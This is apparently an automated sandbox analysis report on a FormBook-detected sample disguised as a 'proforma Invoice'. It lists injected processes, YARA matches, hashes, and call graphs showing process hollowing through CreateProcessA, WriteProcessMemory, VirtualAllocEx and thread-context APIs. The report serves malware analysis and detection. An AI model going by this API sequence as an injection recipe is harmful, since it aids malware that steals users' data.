                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:04:09:29
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe"
                                                                        Imagebase:0x520000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:6
                                                                        Start time:04:09:32
                                                                        Start date:07/11/2024
                                                                        Path:C:\Windows\SysWOW64\EhStorAuthn.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\EhStorAuthn.exe"
                                                                        Imagebase:0x9e0000
                                                                        File size:119'808 bytes
                                                                        MD5 hash:0C9245FDD67B14B9E7FBEBB88C3A5E7F
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:8
                                                                        Start time:04:09:45
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe"
                                                                        Imagebase:0x520000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:9
                                                                        Start time:04:09:57
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff79f9e0000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:10.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:202
                                                                          Total number of Limit Nodes:11
                                                                          execution_graph 27152 7d9e898 27153 7d9ea23 27152->27153 27154 7d9e8be 27152->27154 27154->27153 27156 7d9add0 27154->27156 27157 7d9eb18 PostMessageW 27156->27157 27158 7d9eb84 27157->27158 27158->27154 27159 147d0c0 27160 147d106 GetCurrentProcess 27159->27160 27162 147d151 27160->27162 27163 147d158 GetCurrentThread 27160->27163 27162->27163 27164 147d195 GetCurrentProcess 27163->27164 27165 147d18e 27163->27165 27166 147d1cb 27164->27166 27165->27164 27167 147d1f3 GetCurrentThreadId 27166->27167 27168 147d224 27167->27168 27191 147d710 DuplicateHandle 27192 147d7a6 27191->27192 27193 147ad30 27194 147ad3f 27193->27194 27197 147ae18 27193->27197 27202 147ae28 27193->27202 27198 147ae39 27197->27198 27199 147ae5c 27197->27199 27198->27199 27200 147b060 GetModuleHandleW 27198->27200 27199->27194 27201 147b08d 27200->27201 27201->27194 27203 147ae5c 27202->27203 27204 147ae39 27202->27204 27203->27194 27204->27203 27205 147b060 GetModuleHandleW 27204->27205 27206 147b08d 27205->27206 27206->27194 27207 7d991e1 27208 7d990c7 27207->27208 27209 7d9910a 27207->27209 27212 7d9bb98 27208->27212 27216 7d9bb88 27208->27216 27213 7d9bbcb 27212->27213 27214 7d9bc39 27213->27214 27220 7d9bf20 27213->27220 27214->27209 27217 7d9bb98 27216->27217 27218 7d9bc39 27217->27218 27219 7d9bf20 ResumeThread 27217->27219 27218->27209 27219->27218 27221 7d9bf2a 27220->27221 27222 7d9bf81 ResumeThread 27220->27222 27221->27214 27224 7d9bff9 27222->27224 27224->27214 27225 7d9cf80 27230 7d9d6a0 27225->27230 27248 7d9d706 27225->27248 27267 7d9d692 27225->27267 27226 7d9cca9 27231 7d9d6ba 27230->27231 27232 7d9d6c2 27231->27232 27285 7d9e1f9 27231->27285 27292 7d9dd82 27231->27292 27297 7d9de61 27231->27297 27302 7d9dde1 27231->27302 27307 7d9e1ae 27231->27307 27311 7d9dcef 27231->27311 27317 7d9dd0d 27231->27317 27324 7d9e2ab 27231->27324 27329 7d9de4b 27231->27329 27334 7d9db36 27231->27334 27339 7d9dc7e 27231->27339 27344 7d9dc9e 27231->27344 27349 7d9dedd 27231->27349 27355 7d9df1b 27231->27355 27359 7d9da99 27231->27359 27232->27226 27249 7d9d694 27248->27249 27251 7d9d709 27248->27251 27250 7d9d6c2 27249->27250 27252 7d9e1f9 3 API calls 27249->27252 27253 7d9da99 2 API calls 27249->27253 27254 7d9df1b 2 API calls 27249->27254 27255 7d9dedd 3 API calls 27249->27255 27256 7d9dc9e 2 API calls 27249->27256 27257 7d9dc7e 2 API calls 27249->27257 27258 7d9db36 2 API calls 27249->27258 27259 7d9de4b 2 API calls 27249->27259 27260 7d9e2ab 2 API calls 27249->27260 27261 7d9dd0d 3 API calls 27249->27261 27262 7d9dcef 3 API calls 27249->27262 27263 7d9e1ae 2 API calls 27249->27263 27264 7d9dde1 2 API calls 27249->27264 27265 7d9de61 2 API calls 27249->27265 27266 7d9dd82 2 API calls 27249->27266 27250->27226 27251->27226 27252->27250 27253->27250 27254->27250 27255->27250 27256->27250 27257->27250 27258->27250 27259->27250 27260->27250 27261->27250 27262->27250 27263->27250 27264->27250 27265->27250 27266->27250 27268 7d9d6a0 27267->27268 27269 7d9d6c2 27268->27269 27270 7d9e1f9 3 API calls 27268->27270 27271 7d9da99 2 API calls 27268->27271 27272 7d9df1b 2 API calls 27268->27272 27273 7d9dedd 3 API calls 27268->27273 27274 7d9dc9e 2 API calls 27268->27274 27275 7d9dc7e 2 API calls 27268->27275 27276 7d9db36 2 API calls 27268->27276 27277 7d9de4b 2 API calls 27268->27277 27278 7d9e2ab 2 API calls 27268->27278 27279 7d9dd0d 3 API calls 27268->27279 27280 7d9dcef 3 API calls 27268->27280 27281 7d9e1ae 2 API calls 27268->27281 27282 7d9dde1 2 API calls 27268->27282 27283 7d9de61 2 API calls 27268->27283 27284 7d9dd82 2 API calls 27268->27284 27269->27226 27270->27269 27271->27269 27272->27269 27273->27269 27274->27269 27275->27269 27276->27269 27277->27269 27278->27269 27279->27269 27280->27269 27281->27269 27282->27269 27283->27269 27284->27269 27286 7d9dd06 27285->27286 27287 7d9e272 27286->27287 27291 7d9bf20 ResumeThread 27286->27291 27363 7d9bf88 27286->27363 27367 7d9bf80 27286->27367 27288 7d9e098 27291->27288 27293 7d9dd88 27292->27293 27371 7d9c1d0 27293->27371 27375 7d9c1c8 27293->27375 27294 7d9ddc1 27294->27232 27298 7d9de80 27297->27298 27300 7d9c1c8 WriteProcessMemory 27298->27300 27301 7d9c1d0 WriteProcessMemory 27298->27301 27299 7d9dea4 27300->27299 27301->27299 27303 7d9dde7 27302->27303 27304 7d9de5a 27303->27304 27379 7d9c038 27303->27379 27383 7d9c030 27303->27383 27309 7d9c038 Wow64SetThreadContext 27307->27309 27310 7d9c030 Wow64SetThreadContext 27307->27310 27308 7d9e1c8 27309->27308 27310->27308 27312 7d9dcf5 27311->27312 27314 7d9bf88 ResumeThread 27312->27314 27315 7d9bf80 ResumeThread 27312->27315 27316 7d9bf20 ResumeThread 27312->27316 27313 7d9e098 27314->27313 27315->27313 27316->27313 27319 7d9dd12 27317->27319 27318 7d9e112 27319->27318 27321 7d9bf88 ResumeThread 27319->27321 27322 7d9bf80 ResumeThread 27319->27322 27323 7d9bf20 ResumeThread 27319->27323 27320 7d9e098 27321->27320 27322->27320 27323->27320 27325 7d9dda0 27324->27325 27326 7d9ddc1 27324->27326 27327 7d9c1c8 WriteProcessMemory 27325->27327 27328 7d9c1d0 WriteProcessMemory 27325->27328 27326->27232 27327->27326 27328->27326 27330 7d9dde7 27329->27330 27330->27329 27331 7d9de5a 27330->27331 27332 7d9c038 Wow64SetThreadContext 27330->27332 27333 7d9c030 Wow64SetThreadContext 27330->27333 27332->27330 27333->27330 27335 7d9db59 27334->27335 27337 7d9c1c8 WriteProcessMemory 27335->27337 27338 7d9c1d0 WriteProcessMemory 27335->27338 27336 7d9dcd0 27336->27232 27336->27336 27337->27336 27338->27336 27340 7d9e278 27339->27340 27387 7d9c108 27340->27387 27391 7d9c110 27340->27391 27341 7d9e296 27341->27232 27345 7d9dca1 27344->27345 27347 7d9c1c8 WriteProcessMemory 27345->27347 27348 7d9c1d0 WriteProcessMemory 27345->27348 27346 7d9dcd0 27346->27232 27346->27346 27347->27346 27348->27346 27350 7d9dee3 27349->27350 27352 7d9bf88 ResumeThread 27350->27352 27353 7d9bf80 ResumeThread 27350->27353 27354 7d9bf20 ResumeThread 27350->27354 27351 7d9e098 27352->27351 27353->27351 27354->27351 27395 7d9c2b8 27355->27395 27399 7d9c2c0 27355->27399 27356 7d9df3d 27356->27232 27403 7d9c890 27359->27403 27407 7d9c885 27359->27407 27364 7d9bfc8 ResumeThread 27363->27364 27366 7d9bff9 27364->27366 27366->27288 27368 7d9bf88 ResumeThread 27367->27368 27370 7d9bff9 27368->27370 27370->27288 27372 7d9c218 WriteProcessMemory 27371->27372 27374 7d9c26f 27372->27374 27374->27294 27376 7d9c1d0 WriteProcessMemory 27375->27376 27378 7d9c26f 27376->27378 27378->27294 27380 7d9c07d Wow64SetThreadContext 27379->27380 27382 7d9c0c5 27380->27382 27382->27303 27384 7d9c038 Wow64SetThreadContext 27383->27384 27386 7d9c0c5 27384->27386 27386->27303 27388 7d9c110 VirtualAllocEx 27387->27388 27390 7d9c18d 27388->27390 27390->27341 27392 7d9c150 VirtualAllocEx 27391->27392 27394 7d9c18d 27392->27394 27394->27341 27396 7d9c30b ReadProcessMemory 27395->27396 27398 7d9c34f 27396->27398 27398->27356 27400 7d9c30b ReadProcessMemory 27399->27400 27402 7d9c34f 27400->27402 27402->27356 27404 7d9c919 CreateProcessA 27403->27404 27406 7d9cadb 27404->27406 27406->27406 27408 7d9c919 CreateProcessA 27407->27408 27410 7d9cadb 27408->27410 27410->27410 27169 1474668 27170 147467a 27169->27170 27171 1474686 27170->27171 27173 1474778 27170->27173 27174 147479d 27173->27174 27178 1474878 27174->27178 27183 1474888 27174->27183 27179 14747a7 27178->27179 27180 1474887 27178->27180 27179->27171 27181 147498c 27180->27181 27187 14744b0 27180->27187 27185 14748af 27183->27185 27184 147498c 27184->27184 27185->27184 27186 14744b0 CreateActCtxA 27185->27186 27186->27184 27188 1475918 CreateActCtxA 27187->27188 27190 14759db 27188->27190

                                                                          Executed Functions

                                                                          Function 07D9FA00 Relevance: .6, Instructions: 571COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 92b1c801e2cb8390e6a6cda9b98274c7675c8e26f29f8b0436242788c078683b
                                                                          • Instruction ID: a72b8e4d8fd80cfa5a0063cdd7a94cf2e706b117b85982ba1e0e405c473c95cb
                                                                          • Opcode Fuzzy Hash: 92b1c801e2cb8390e6a6cda9b98274c7675c8e26f29f8b0436242788c078683b
                                                                          • Instruction Fuzzy Hash: BBC1AEB17007018FDB19DB76C450BAEB7FAAF89605F28487ED146CB2A0DB35E806C751
                                                                          Function 07D90040 Relevance: .5, Instructions: 506COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 63f94e34f8281afa9e971aed137fc03ead9019bc5d8b3f947e4ce7ea7f00f574
                                                                          • Instruction ID: 81915bb00b5be01d9e2053ea0a587cb9056cf5091f60f392c92ae3cf18ea9aff
                                                                          • Opcode Fuzzy Hash: 63f94e34f8281afa9e971aed137fc03ead9019bc5d8b3f947e4ce7ea7f00f574
                                                                          • Instruction Fuzzy Hash: 374292B8E11219CFDB54CF69D984B9DBBF2BF48310F5481A9E809A7355D730AA81CF60
                                                                          Function 07D9001F Relevance: .2, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c62ed2db77c917addf0df37c091ebb6f5c64911024ae89855e3d585a42bda02f
                                                                          • Instruction ID: 9ca55eace432c7ae8609926a0d2b927c223cab813e46a17afb7b55928d8cc91e
                                                                          • Opcode Fuzzy Hash: c62ed2db77c917addf0df37c091ebb6f5c64911024ae89855e3d585a42bda02f
                                                                          • Instruction Fuzzy Hash: 5A71D874E01219CFDB18CF6AD884B9DBBF2BF88310F1481A9D809A7355D731A941CF60
                                                                          Function 07D93038 Relevance: .1, Instructions: 140COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2e0ff7ac73ebb6f4eb0378ee481bf004c5e25c36a06e7ed8418cc972fe4f4476
                                                                          • Instruction ID: ab1a0fa59d4987c673ea6497cb17f5a14e88b98face905a2a9cc748e1674d8d1
                                                                          • Opcode Fuzzy Hash: 2e0ff7ac73ebb6f4eb0378ee481bf004c5e25c36a06e7ed8418cc972fe4f4476
                                                                          • Instruction Fuzzy Hash: 4C517FB5E016199FDF08DFEAC8446EEFBB2FF89310F10802AE419AB254DB345946CB50
                                                                          Function 07D93028 Relevance: .1, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f68e4b4adf4b2da9192f55a1682ac80c0c330f0eeb73c6bf2e6f3645ad044bb4
                                                                          • Instruction ID: 9ee1271b3a619ce0c160f767104780f87b247daa9f01fcf71e812e30aa5deac1
                                                                          • Opcode Fuzzy Hash: f68e4b4adf4b2da9192f55a1682ac80c0c330f0eeb73c6bf2e6f3645ad044bb4
                                                                          • Instruction Fuzzy Hash: C34190B5E006199FDB08CFEAC9456AEFBF2BF88310F14C16AD419AB254DB345946CF40
                                                                          Function 0147D0B0 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 526 147d0b0-147d14f GetCurrentProcess 530 147d151-147d157 526->530 531 147d158-147d18c GetCurrentThread 526->531 530->531 532 147d195-147d1c9 GetCurrentProcess 531->532 533 147d18e-147d194 531->533 535 147d1d2-147d1ed call 147d699 532->535 536 147d1cb-147d1d1 532->536 533->532 539 147d1f3-147d222 GetCurrentThreadId 535->539 536->535 540 147d224-147d22a 539->540 541 147d22b-147d28d 539->541 540->541
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0147D13E
                                                                          • GetCurrentThread.KERNEL32 ref: 0147D17B
                                                                          • GetCurrentProcess.KERNEL32 ref: 0147D1B8
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0147D211
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 8d6660a3945bb58e26ff3461b81bfc52ea011cb4215d9ee287ee7632e5fb4569
                                                                          • Instruction ID: 202e7e12adeab77b77511d6815285344c2d00249a668049ac67c5af73e69a972
                                                                          • Opcode Fuzzy Hash: 8d6660a3945bb58e26ff3461b81bfc52ea011cb4215d9ee287ee7632e5fb4569
                                                                          • Instruction Fuzzy Hash: 605152B0D002498FDB14DFAAD558BEEBFF1EF89314F24845AE009A73A0D7789844CB65
                                                                          Function 0147D0C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 548 147d0c0-147d14f GetCurrentProcess 552 147d151-147d157 548->552 553 147d158-147d18c GetCurrentThread 548->553 552->553 554 147d195-147d1c9 GetCurrentProcess 553->554 555 147d18e-147d194 553->555 557 147d1d2-147d1ed call 147d699 554->557 558 147d1cb-147d1d1 554->558 555->554 561 147d1f3-147d222 GetCurrentThreadId 557->561 558->557 562 147d224-147d22a 561->562 563 147d22b-147d28d 561->563 562->563
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0147D13E
                                                                          • GetCurrentThread.KERNEL32 ref: 0147D17B
                                                                          • GetCurrentProcess.KERNEL32 ref: 0147D1B8
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0147D211
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 8aebe50e951508de6590fd30cb0af7ab523ec79ace0ddd28d5a42c9dd537e6bc
                                                                          • Instruction ID: 9492baecab22dd3470836576c6ed1ed0af87a110c40d257666a14247dc63cfcf
                                                                          • Opcode Fuzzy Hash: 8aebe50e951508de6590fd30cb0af7ab523ec79ace0ddd28d5a42c9dd537e6bc
                                                                          • Instruction Fuzzy Hash: DC5154B0D003098FDB14DFAAD648BEEBBF5EF88314F208459E119A7360D7389844CB65
                                                                          Function 07D9C885 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 834 7d9c885-7d9c925 836 7d9c95e-7d9c97e 834->836 837 7d9c927-7d9c931 834->837 842 7d9c980-7d9c98a 836->842 843 7d9c9b7-7d9c9e6 836->843 837->836 838 7d9c933-7d9c935 837->838 840 7d9c958-7d9c95b 838->840 841 7d9c937-7d9c941 838->841 840->836 844 7d9c943 841->844 845 7d9c945-7d9c954 841->845 842->843 846 7d9c98c-7d9c98e 842->846 853 7d9c9e8-7d9c9f2 843->853 854 7d9ca1f-7d9cad9 CreateProcessA 843->854 844->845 845->845 847 7d9c956 845->847 848 7d9c9b1-7d9c9b4 846->848 849 7d9c990-7d9c99a 846->849 847->840 848->843 851 7d9c99c 849->851 852 7d9c99e-7d9c9ad 849->852 851->852 852->852 855 7d9c9af 852->855 853->854 856 7d9c9f4-7d9c9f6 853->856 865 7d9cadb-7d9cae1 854->865 866 7d9cae2-7d9cb68 854->866 855->848 858 7d9ca19-7d9ca1c 856->858 859 7d9c9f8-7d9ca02 856->859 858->854 860 7d9ca04 859->860 861 7d9ca06-7d9ca15 859->861 860->861 861->861 862 7d9ca17 861->862 862->858 865->866 876 7d9cb78-7d9cb7c 866->876 877 7d9cb6a-7d9cb6e 866->877 879 7d9cb8c-7d9cb90 876->879 880 7d9cb7e-7d9cb82 876->880 877->876 878 7d9cb70 877->878 878->876 882 7d9cba0-7d9cba4 879->882 883 7d9cb92-7d9cb96 879->883 880->879 881 7d9cb84 880->881 881->879 885 7d9cbb6-7d9cbbd 882->885 886 7d9cba6-7d9cbac 882->886 883->882 884 7d9cb98 883->884 884->882 887 7d9cbbf-7d9cbce 885->887 888 7d9cbd4 885->888 886->885 887->888 890 7d9cbd5 888->890 890->890
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D9CAC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 1aaf8a6cce0e7c74fbc74c7fbeb3ab7f5688c3932c10b330992e6ad2836d5c41
                                                                          • Instruction ID: 41dcd57133142f9c58fc0a967372e825682c90fe1e2ec8be0e3b49ce92b3bb25
                                                                          • Opcode Fuzzy Hash: 1aaf8a6cce0e7c74fbc74c7fbeb3ab7f5688c3932c10b330992e6ad2836d5c41
                                                                          • Instruction Fuzzy Hash: D59149B1D1021ADFDF14CFA8C9407EDBBB2AF48314F1485AAD809A7290DB759985CFA1
                                                                          Function 07D9C890 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 891 7d9c890-7d9c925 893 7d9c95e-7d9c97e 891->893 894 7d9c927-7d9c931 891->894 899 7d9c980-7d9c98a 893->899 900 7d9c9b7-7d9c9e6 893->900 894->893 895 7d9c933-7d9c935 894->895 897 7d9c958-7d9c95b 895->897 898 7d9c937-7d9c941 895->898 897->893 901 7d9c943 898->901 902 7d9c945-7d9c954 898->902 899->900 903 7d9c98c-7d9c98e 899->903 910 7d9c9e8-7d9c9f2 900->910 911 7d9ca1f-7d9cad9 CreateProcessA 900->911 901->902 902->902 904 7d9c956 902->904 905 7d9c9b1-7d9c9b4 903->905 906 7d9c990-7d9c99a 903->906 904->897 905->900 908 7d9c99c 906->908 909 7d9c99e-7d9c9ad 906->909 908->909 909->909 912 7d9c9af 909->912 910->911 913 7d9c9f4-7d9c9f6 910->913 922 7d9cadb-7d9cae1 911->922 923 7d9cae2-7d9cb68 911->923 912->905 915 7d9ca19-7d9ca1c 913->915 916 7d9c9f8-7d9ca02 913->916 915->911 917 7d9ca04 916->917 918 7d9ca06-7d9ca15 916->918 917->918 918->918 919 7d9ca17 918->919 919->915 922->923 933 7d9cb78-7d9cb7c 923->933 934 7d9cb6a-7d9cb6e 923->934 936 7d9cb8c-7d9cb90 933->936 937 7d9cb7e-7d9cb82 933->937 934->933 935 7d9cb70 934->935 935->933 939 7d9cba0-7d9cba4 936->939 940 7d9cb92-7d9cb96 936->940 937->936 938 7d9cb84 937->938 938->936 942 7d9cbb6-7d9cbbd 939->942 943 7d9cba6-7d9cbac 939->943 940->939 941 7d9cb98 940->941 941->939 944 7d9cbbf-7d9cbce 942->944 945 7d9cbd4 942->945 943->942 944->945 947 7d9cbd5 945->947 947->947
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D9CAC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 39ff43188cd9c24fbf96d4e473ba8e51ad93bea26b912c020f34c1bbdb7a66ef
                                                                          • Instruction ID: da4c8a9b701416de83f1c3fb1bb3ebb4c8fb06f48c3359d4d6c18ad6f933f826
                                                                          • Opcode Fuzzy Hash: 39ff43188cd9c24fbf96d4e473ba8e51ad93bea26b912c020f34c1bbdb7a66ef
                                                                          • Instruction Fuzzy Hash: AA914AB1D1021ADFDF14CFA8C9407EDFBB2AF48314F1485AAD809A7290DB759985CFA1
                                                                          Function 0147AE28 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 948 147ae28-147ae37 949 147ae63-147ae67 948->949 950 147ae39-147ae46 call 147a14c 948->950 951 147ae7b-147aebc 949->951 952 147ae69-147ae73 949->952 955 147ae5c 950->955 956 147ae48 950->956 959 147aebe-147aec6 951->959 960 147aec9-147aed7 951->960 952->951 955->949 1006 147ae4e call 147b0b1 956->1006 1007 147ae4e call 147b0c0 956->1007 959->960 962 147aefb-147aefd 960->962 963 147aed9-147aede 960->963 961 147ae54-147ae56 961->955 967 147af98-147b058 961->967 966 147af00-147af07 962->966 964 147aee0-147aee7 call 147a158 963->964 965 147aee9 963->965 968 147aeeb-147aef9 964->968 965->968 970 147af14-147af1b 966->970 971 147af09-147af11 966->971 999 147b060-147b08b GetModuleHandleW 967->999 1000 147b05a-147b05d 967->1000 968->966 973 147af1d-147af25 970->973 974 147af28-147af31 call 147a168 970->974 971->970 973->974 979 147af33-147af3b 974->979 980 147af3e-147af43 974->980 979->980 982 147af45-147af4c 980->982 983 147af61-147af65 980->983 982->983 984 147af4e-147af5e call 147a178 call 147a188 982->984 1004 147af68 call 147b3c0 983->1004 1005 147af68 call 147b3bf 983->1005 984->983 985 147af6b-147af6e 989 147af91-147af97 985->989 990 147af70-147af8e 985->990 990->989 1001 147b094-147b0a8 999->1001 1002 147b08d-147b093 999->1002 1000->999 1002->1001 1004->985 1005->985 1006->961 1007->961
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0147B07E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 6d66420cfcfb648a3ce6f77b972269874961fb3568cd4b561f3a1dc11c431191
                                                                          • Instruction ID: 8c7dc7b815cc4411a71ef419329c10a9f1f66714db144e93cbd172e0ee4b449f
                                                                          • Opcode Fuzzy Hash: 6d66420cfcfb648a3ce6f77b972269874961fb3568cd4b561f3a1dc11c431191
                                                                          • Instruction Fuzzy Hash: B07114B0A00B058FD724DF2AD45479ABBF5FF88214F148A2ED586D7B60D735E845CB90
                                                                          Function 0147590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
